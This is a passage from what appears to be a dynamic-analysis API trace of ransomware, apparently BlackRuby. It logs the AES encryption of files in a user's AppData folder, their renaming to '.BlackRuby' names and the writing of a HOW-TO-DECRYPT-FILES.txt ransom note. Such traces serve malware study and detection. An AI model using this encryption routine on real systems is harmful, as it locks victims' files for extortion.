(hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0050.240] GetLastError () returned 0x0 [0050.240] CryptDuplicateKey (in: hKey=0x360a20, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ec78 | out: phKey=0x18ec78*=0x360ae0) returned 1 [0050.240] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0050.240] GetLastError () returned 0x0 [0050.240] CryptSetKeyParam (hKey=0x360ae0, dwParam=0x4, pbData=0x1c67454*=0x1, dwFlags=0x0) returned 1 [0050.240] GetLastError () returned 0x0 [0050.240] CryptSetKeyParam (hKey=0x360ae0, dwParam=0x1, pbData=0x1c67420, dwFlags=0x0) returned 1 [0050.240] GetLastError () returned 0x0 [0050.241] CryptEncrypt (in: hKey=0x360ae0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2b17f60*, pdwDataLen=0x18ed08*=0x17de0, dwBufLen=0x17de0 | out: pbData=0x2b17f60*, pdwDataLen=0x18ed08*=0x17de0) returned 1 [0050.241] GetLastError () returned 0x0 [0050.242] CryptEncrypt (in: hKey=0x360ae0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c674b0*, pdwDataLen=0x18ed20*=0x10, dwBufLen=0x10 | out: pbData=0x1c674b0*, pdwDataLen=0x18ed20*=0x10) returned 1 [0050.242] GetLastError () returned 0x0 [0050.242] CryptEncrypt (in: hKey=0x360ae0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1c674e0*, pdwDataLen=0x18ed28*=0x0, dwBufLen=0x10 | out: pbData=0x1c674e0*, pdwDataLen=0x18ed28*=0x10) returned 1 [0050.242] GetLastError () returned 0x0 [0050.244] CryptDestroyKey (hKey=0x360a20) returned 1 [0050.244] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0050.244] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0050.244] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\-08IenZnG1In.gif", nBufferLength=0x105, lpBuffer=0x18e7c4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\-08IenZnG1In.gif", lpFilePart=0x0) returned 0x31 [0050.244] GetLastError () returned 0x0 [0050.244] SetErrorMode (uMode=0x1) returned 0x0 [0050.244] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\-08IenZnG1In.gif" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\-08ienzng1in.gif"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0050.245] GetLastError () returned 0xb7 [0050.245] GetFileType (hFile=0x184) returned 0x1 [0050.245] SetErrorMode (uMode=0x0) returned 0x1 [0050.246] GetFileType (hFile=0x184) returned 0x1 [0050.248] CloseHandle (hObject=0x184) returned 1 [0050.248] GetLastError () returned 0xb7 [0050.248] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\-08IenZnG1In.gif", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\-08IenZnG1In.gif", lpFilePart=0x0) returned 0x31 [0050.248] GetLastError () returned 0xb7 [0050.248] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Encrypted_DULtEr6HykkXBNn483vqQroidmmSktmBOb7rhyQJ.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Encrypted_DULtEr6HykkXBNn483vqQroidmmSktmBOb7rhyQJ.BlackRuby", lpFilePart=0x0) returned 0x5d [0050.248] GetLastError () returned 0xb7 [0050.248] SetErrorMode (uMode=0x1) returned 0x0 [0050.248] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\-08IenZnG1In.gif" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\-08ienzng1in.gif"), fInfoLevelId=0x0, lpFileInformation=0x18ed68 | out: lpFileInformation=0x18ed68*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x200d98c0, ftCreationTime.dwHighDateTime=0x1d35211, ftLastAccessTime.dwLowDateTime=0x37298620, ftLastAccessTime.dwHighDateTime=0x1d3506a, ftLastWriteTime.dwLowDateTime=0x26265e40, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x17df0)) returned 1 [0050.248] GetLastError () returned 0xb7 [0050.248] SetErrorMode (uMode=0x0) returned 0x1 [0050.248] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\-08IenZnG1In.gif" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\-08ienzng1in.gif"), lpNewFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Encrypted_DULtEr6HykkXBNn483vqQroidmmSktmBOb7rhyQJ.BlackRuby" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\encrypted_dulter6hykkxbnn483vqqroidmmsktmbob7rhyqj.blackruby")) returned 1 [0050.249] GetLastError () returned 0xb7 [0050.249] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x39 [0050.249] GetLastError () returned 0xb7 [0050.249] SetErrorMode (uMode=0x1) returned 0x0 [0050.249] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0050.250] GetLastError () returned 0x0 [0050.250] GetFileType (hFile=0x184) returned 0x1 [0050.250] SetErrorMode (uMode=0x0) returned 0x1 [0050.250] GetFileType (hFile=0x184) returned 0x1 [0050.251] CloseHandle (hObject=0x184) returned 1 [0050.251] GetLastError () returned 0x0 [0050.251] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e8f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x39 [0050.251] GetLastError () returned 0x0 [0050.251] SetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0050.251] GetLastError () returned 0x0 [0050.251] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\-xMMVrqKe.flv", nBufferLength=0x105, lpBuffer=0x18e920, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\-xMMVrqKe.flv", lpFilePart=0x0) returned 0x2e [0050.252] GetLastError () returned 0x0 [0050.252] SetErrorMode (uMode=0x1) returned 0x0 [0050.252] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\-xMMVrqKe.flv" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\-xmmvrqke.flv"), fInfoLevelId=0x0, lpFileInformation=0x1c842d8 | out: lpFileInformation=0x1c842d8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd84a2880, ftCreationTime.dwHighDateTime=0x1d3586b, ftLastAccessTime.dwLowDateTime=0xe11d9670, ftLastAccessTime.dwHighDateTime=0x1d34cc4, ftLastWriteTime.dwLowDateTime=0xe11d9670, ftLastWriteTime.dwHighDateTime=0x1d34cc4, nFileSizeHigh=0x0, nFileSizeLow=0x16b02)) returned 1 [0050.252] GetLastError () returned 0x0 [0050.252] SetErrorMode (uMode=0x0) returned 0x1 [0050.252] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\-xMMVrqKe.flv", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\-xMMVrqKe.flv", lpFilePart=0x0) returned 0x2e [0050.252] GetLastError () returned 0x0 [0050.252] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\-xMMVrqKe.flv", nBufferLength=0x105, lpBuffer=0x18e7bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\-xMMVrqKe.flv", lpFilePart=0x0) returned 0x2e [0050.252] GetLastError () returned 0x0 [0050.252] SetErrorMode (uMode=0x1) returned 0x0 [0050.252] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\-xMMVrqKe.flv" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\-xmmvrqke.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0050.252] GetLastError () returned 0x0 [0050.252] GetFileType (hFile=0x184) returned 0x1 [0050.252] SetErrorMode (uMode=0x0) returned 0x1 [0050.252] GetFileType (hFile=0x184) returned 0x1 [0050.252] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18ed70 | out: lpFileSizeHigh=0x18ed70*=0x0) returned 0x16b02 [0050.252] GetLastError () returned 0x0 [0050.253] ReadFile (in: hFile=0x184, lpBuffer=0x2b8f550, nNumberOfBytesToRead=0x16b02, lpNumberOfBytesRead=0x18ed18, lpOverlapped=0x0 | out: lpBuffer=0x2b8f550*, lpNumberOfBytesRead=0x18ed18*=0x16b02, lpOverlapped=0x0) returned 1 [0050.255] GetLastError () returned 0x0 [0050.255] CloseHandle (hObject=0x184) returned 1 [0050.255] GetLastError () returned 0x0 [0050.255] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\-xMMVrqKe.flv", nBufferLength=0x105, lpBuffer=0x18e8cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\-xMMVrqKe.flv", lpFilePart=0x0) returned 0x2e [0050.255] GetLastError () returned 0x0 [0050.255] SetErrorMode (uMode=0x1) returned 0x0 [0050.255] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\-xMMVrqKe.flv" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\-xmmvrqke.flv"), fInfoLevelId=0x0, lpFileInformation=0x18ed80 | out: lpFileInformation=0x18ed80*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd84a2880, ftCreationTime.dwHighDateTime=0x1d3586b, ftLastAccessTime.dwLowDateTime=0xe11d9670, ftLastAccessTime.dwHighDateTime=0x1d34cc4, ftLastWriteTime.dwLowDateTime=0xe11d9670, ftLastWriteTime.dwHighDateTime=0x1d34cc4, nFileSizeHigh=0x0, nFileSizeLow=0x16b02)) returned 1 [0050.255] GetLastError () returned 0x0 [0050.255] SetErrorMode (uMode=0x0) returned 0x1 [0050.266] CryptImportKey (in: hProv=0x37c708, pbData=0x1ce0450, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ecbc | out: phKey=0x18ecbc*=0x360b60) returned 1 [0050.266] GetLastError () returned 0x0 [0050.266] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0050.266] GetLastError () returned 0x0 [0050.271] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0050.271] GetLastError () returned 0x0 [0050.271] CryptDuplicateKey (in: hKey=0x360b60, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ec78 | out: phKey=0x18ec78*=0x3609e0) returned 1 [0050.271] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0050.271] GetLastError () returned 0x0 [0050.271] CryptSetKeyParam (hKey=0x3609e0, dwParam=0x4, pbData=0x1d0d49c*=0x1, dwFlags=0x0) returned 1 [0050.271] GetLastError () returned 0x0 [0050.271] CryptSetKeyParam (hKey=0x3609e0, dwParam=0x1, pbData=0x1d0d468, dwFlags=0x0) returned 1 [0050.271] GetLastError () returned 0x0 [0050.272] CryptEncrypt (in: hKey=0x3609e0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2bbcc90*, pdwDataLen=0x18ed08*=0x16c00, dwBufLen=0x16c00 | out: pbData=0x2bbcc90*, pdwDataLen=0x18ed08*=0x16c00) returned 1 [0050.272] GetLastError () returned 0x0 [0050.273] CryptEncrypt (in: hKey=0x3609e0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d0d4f8*, pdwDataLen=0x18ed20*=0x10, dwBufLen=0x10 | out: pbData=0x1d0d4f8*, pdwDataLen=0x18ed20*=0x10) returned 1 [0050.273] GetLastError () returned 0x0 [0050.273] CryptEncrypt (in: hKey=0x3609e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d0d528*, pdwDataLen=0x18ed28*=0x0, dwBufLen=0x10 | out: pbData=0x1d0d528*, pdwDataLen=0x18ed28*=0x10) returned 1 [0050.273] GetLastError () returned 0x0 [0050.273] CryptDestroyKey (hKey=0x360b60) returned 1 [0050.273] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0050.273] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0050.273] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\-xMMVrqKe.flv", nBufferLength=0x105, lpBuffer=0x18e7c4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\-xMMVrqKe.flv", lpFilePart=0x0) returned 0x2e [0050.273] GetLastError () returned 0x0 [0050.274] SetErrorMode (uMode=0x1) returned 0x0 [0050.276] GetFileType (hFile=0x184) returned 0x1 [0050.276] GetFileType (hFile=0x184) returned 0x1 [0050.279] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\-xMMVrqKe.flv" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\-xmmvrqke.flv"), lpNewFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Encrypted_PpZtPdBwqQA0RmW8Yiv6dLTnV6Cagm78wFnDxacu4gUaV.BlackRuby" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\encrypted_ppztpdbwqqa0rmw8yiv6dltnv6cagm78wfndxacu4guav.blackruby")) returned 1 [0050.280] GetLastError () returned 0xb7 [0050.283] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x39 [0050.283] GetLastError () returned 0xb7 [0050.283] SetErrorMode (uMode=0x1) returned 0x0 [0050.283] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0050.283] GetLastError () returned 0x5 [0050.285] SetErrorMode (uMode=0x0) returned 0x1 [0050.285] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\1lw44krbCfhLJg43Alp.mp4", nBufferLength=0x105, lpBuffer=0x18e920, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\1lw44krbCfhLJg43Alp.mp4", lpFilePart=0x0) returned 0x38 [0050.285] GetLastError () returned 0x5 [0050.285] SetErrorMode (uMode=0x1) returned 0x0 [0050.285] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\1lw44krbCfhLJg43Alp.mp4" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\1lw44krbcfhljg43alp.mp4"), fInfoLevelId=0x0, lpFileInformation=0x1b2e4c0 | out: lpFileInformation=0x1b2e4c0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x14556b80, ftCreationTime.dwHighDateTime=0x1d351b1, ftLastAccessTime.dwLowDateTime=0x7c7984a0, ftLastAccessTime.dwHighDateTime=0x1d3533f, ftLastWriteTime.dwLowDateTime=0x7c7984a0, ftLastWriteTime.dwHighDateTime=0x1d3533f, nFileSizeHigh=0x0, nFileSizeLow=0xff5d)) returned 1 [0050.285] GetLastError () returned 0x5 [0050.285] SetErrorMode (uMode=0x0) returned 0x1 [0050.286] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\1lw44krbCfhLJg43Alp.mp4", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\1lw44krbCfhLJg43Alp.mp4", lpFilePart=0x0) returned 0x38 [0050.286] GetLastError () returned 0x5 [0050.286] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\1lw44krbCfhLJg43Alp.mp4", nBufferLength=0x105, lpBuffer=0x18e7bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\1lw44krbCfhLJg43Alp.mp4", lpFilePart=0x0) returned 0x38 [0050.286] GetLastError () returned 0x5 [0050.286] SetErrorMode (uMode=0x1) returned 0x0 [0050.286] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\1lw44krbCfhLJg43Alp.mp4" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\1lw44krbcfhljg43alp.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0050.286] GetLastError () returned 0x0 [0050.286] GetFileType (hFile=0x184) returned 0x1 [0050.286] SetErrorMode (uMode=0x0) returned 0x1 [0050.286] GetFileType (hFile=0x184) returned 0x1 [0050.286] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18ed70 | out: lpFileSizeHigh=0x18ed70*=0x0) returned 0xff5d [0050.286] GetLastError () returned 0x0 [0050.286] ReadFile (in: hFile=0x184, lpBuffer=0x1b306dc, nNumberOfBytesToRead=0xff5d, lpNumberOfBytesRead=0x18ed18, lpOverlapped=0x0 | out: lpBuffer=0x1b306dc*, lpNumberOfBytesRead=0x18ed18*=0xff5d, lpOverlapped=0x0) returned 1 [0050.287] GetLastError () returned 0x0 [0050.287] CloseHandle (hObject=0x184) returned 1 [0050.287] GetLastError () returned 0x0 [0050.287] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\1lw44krbCfhLJg43Alp.mp4", nBufferLength=0x105, lpBuffer=0x18e8cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\1lw44krbCfhLJg43Alp.mp4", lpFilePart=0x0) returned 0x38 [0050.287] GetLastError () returned 0x0 [0050.287] SetErrorMode (uMode=0x1) returned 0x0 [0050.287] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\1lw44krbCfhLJg43Alp.mp4" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\1lw44krbcfhljg43alp.mp4"), fInfoLevelId=0x0, lpFileInformation=0x18ed80 | out: lpFileInformation=0x18ed80*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x14556b80, ftCreationTime.dwHighDateTime=0x1d351b1, ftLastAccessTime.dwLowDateTime=0x7c7984a0, ftLastAccessTime.dwHighDateTime=0x1d3533f, ftLastWriteTime.dwLowDateTime=0x7c7984a0, ftLastWriteTime.dwHighDateTime=0x1d3533f, nFileSizeHigh=0x0, nFileSizeLow=0xff5d)) returned 1 [0050.287] GetLastError () returned 0x0 [0050.287] SetErrorMode (uMode=0x0) returned 0x1 [0050.287] CryptAcquireContextW (in: phProv=0x18ece0, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ece0*=0x37c790) returned 1 [0050.287] GetLastError () returned 0x0 [0050.321] CryptImportKey (in: hProv=0x37c790, pbData=0x1baa97c, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ecbc | out: phKey=0x18ecbc*=0x360ae0) returned 1 [0050.321] GetLastError () returned 0x0 [0050.321] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0050.321] GetLastError () returned 0x0 [0050.326] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0050.326] GetLastError () returned 0x0 [0050.326] CryptDuplicateKey (in: hKey=0x360ae0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ec78 | out: phKey=0x18ec78*=0x360c20) returned 1 [0050.326] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0050.326] GetLastError () returned 0x0 [0050.326] CryptSetKeyParam (hKey=0x360c20, dwParam=0x4, pbData=0x1bd79c8*=0x1, dwFlags=0x0) returned 1 [0050.326] GetLastError () returned 0x0 [0050.326] CryptSetKeyParam (hKey=0x360c20, dwParam=0x1, pbData=0x1bd7994, dwFlags=0x0) returned 1 [0050.326] GetLastError () returned 0x0 [0050.326] CryptEncrypt (in: hKey=0x360c20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1bd7a10*, pdwDataLen=0x18ed08*=0x10050, dwBufLen=0x10050 | out: pbData=0x1bd7a10*, pdwDataLen=0x18ed08*=0x10050) returned 1 [0050.326] GetLastError () returned 0x0 [0050.326] CryptEncrypt (in: hKey=0x360c20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1bf7adc*, pdwDataLen=0x18ed20*=0x10, dwBufLen=0x10 | out: pbData=0x1bf7adc*, pdwDataLen=0x18ed20*=0x10) returned 1 [0050.326] GetLastError () returned 0x0 [0050.326] CryptEncrypt (in: hKey=0x360c20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1bf7b0c*, pdwDataLen=0x18ed28*=0x0, dwBufLen=0x10 | out: pbData=0x1bf7b0c*, pdwDataLen=0x18ed28*=0x10) returned 1 [0050.326] GetLastError () returned 0x0 [0050.327] CryptDestroyKey (hKey=0x360ae0) returned 1 [0050.327] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0050.327] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0050.327] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\1lw44krbCfhLJg43Alp.mp4", nBufferLength=0x105, lpBuffer=0x18e7c4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\1lw44krbCfhLJg43Alp.mp4", lpFilePart=0x0) returned 0x38 [0050.327] GetLastError () returned 0x0 [0050.327] SetErrorMode (uMode=0x1) returned 0x0 [0050.327] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\1lw44krbCfhLJg43Alp.mp4" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\1lw44krbcfhljg43alp.mp4"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0050.329] GetLastError () returned 0xb7 [0050.329] GetFileType (hFile=0x184) returned 0x1 [0050.329] SetErrorMode (uMode=0x0) returned 0x1 [0050.329] GetFileType (hFile=0x184) returned 0x1 [0050.331] CloseHandle (hObject=0x184) returned 1 [0050.331] GetLastError () returned 0xb7 [0050.331] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\1lw44krbCfhLJg43Alp.mp4", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\1lw44krbCfhLJg43Alp.mp4", lpFilePart=0x0) returned 0x38 [0050.331] GetLastError () returned 0xb7 [0050.331] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Encrypted_VUBtVWkmHGMTZTs0mYwCEaIpRjP0eDGaj59t6tEifP1vnJM.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Encrypted_VUBtVWkmHGMTZTs0mYwCEaIpRjP0eDGaj59t6tEifP1vnJM.BlackRuby", lpFilePart=0x0) returned 0x64 [0050.331] GetLastError () returned 0xb7 [0050.331] SetErrorMode (uMode=0x1) returned 0x0 [0050.331] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\1lw44krbCfhLJg43Alp.mp4" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\1lw44krbcfhljg43alp.mp4"), fInfoLevelId=0x0, lpFileInformation=0x18ed68 | out: lpFileInformation=0x18ed68*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x14556b80, ftCreationTime.dwHighDateTime=0x1d351b1, ftLastAccessTime.dwLowDateTime=0x7c7984a0, ftLastAccessTime.dwHighDateTime=0x1d3533f, ftLastWriteTime.dwLowDateTime=0x2634a680, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x10060)) returned 1 [0050.331] GetLastError () returned 0xb7 [0050.331] SetErrorMode (uMode=0x0) returned 0x1 [0050.331] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\1lw44krbCfhLJg43Alp.mp4" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\1lw44krbcfhljg43alp.mp4"), lpNewFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Encrypted_VUBtVWkmHGMTZTs0mYwCEaIpRjP0eDGaj59t6tEifP1vnJM.BlackRuby" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\encrypted_vubtvwkmhgmtzts0mywceaiprjp0edgaj59t6teifp1vnjm.blackruby")) returned 1 [0050.332] GetLastError () returned 0xb7 [0050.332] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x39 [0050.332] GetLastError () returned 0xb7 [0050.332] SetErrorMode (uMode=0x1) returned 0x0 [0050.332] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0050.332] GetLastError () returned 0x5 [0050.333] SetErrorMode (uMode=0x0) returned 0x1 [0050.333] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\2BsFGG4l_YnrDn7sO2b.ods", nBufferLength=0x105, lpBuffer=0x18e920, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\2BsFGG4l_YnrDn7sO2b.ods", lpFilePart=0x0) returned 0x38 [0050.333] GetLastError () returned 0x5 [0050.333] SetErrorMode (uMode=0x1) returned 0x0 [0050.333] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\2BsFGG4l_YnrDn7sO2b.ods" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\2bsfgg4l_ynrdn7so2b.ods"), fInfoLevelId=0x0, lpFileInformation=0x1c24ea4 | out: lpFileInformation=0x1c24ea4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb34b64e0, ftCreationTime.dwHighDateTime=0x1d3528f, ftLastAccessTime.dwLowDateTime=0xfa0382c0, ftLastAccessTime.dwHighDateTime=0x1d3544f, ftLastWriteTime.dwLowDateTime=0xfa0382c0, ftLastWriteTime.dwHighDateTime=0x1d3544f, nFileSizeHigh=0x0, nFileSizeLow=0x18ef9)) returned 1 [0050.333] GetLastError () returned 0x5 [0050.333] SetErrorMode (uMode=0x0) returned 0x1 [0050.333] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\2BsFGG4l_YnrDn7sO2b.ods", nBufferLength=0x105, lpBuffer=0x18e8e8, 